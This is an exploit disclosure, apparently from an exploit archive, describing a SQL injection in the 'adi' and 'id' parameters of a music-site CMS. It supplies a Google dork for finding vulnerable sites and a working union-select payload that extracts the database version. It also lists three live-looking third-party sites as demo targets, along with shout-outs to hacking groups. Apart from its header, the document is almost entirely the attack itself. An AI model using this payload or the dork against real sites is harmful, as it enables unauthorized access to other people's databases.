# Exploit Title: FvS Groupmp3 cms Sql Injection ~ # Google Dork: inurl:/index.php?adi=mp3 # Date: 09/28/2012 # Author: Crim3R # Vendor Home: # Version: - # Tested on: Linux Redhat ===============[Vuln Codes]============= adi parametr in index.php is injectable     D3M0 : mp3.saytim.az/index.php?adi=mp3&id=-1236+union+select+1,2,@@version,4,5,6,7,8,9,10-- mp3.silent.az/index.php?adi=mp3&id=1602 mp3.yeni.az/index.php?adi=mp3&id=1490 ===============Crim3R@Att.Net=========== Sp TnX : Turkblackhats.com - secure-land.net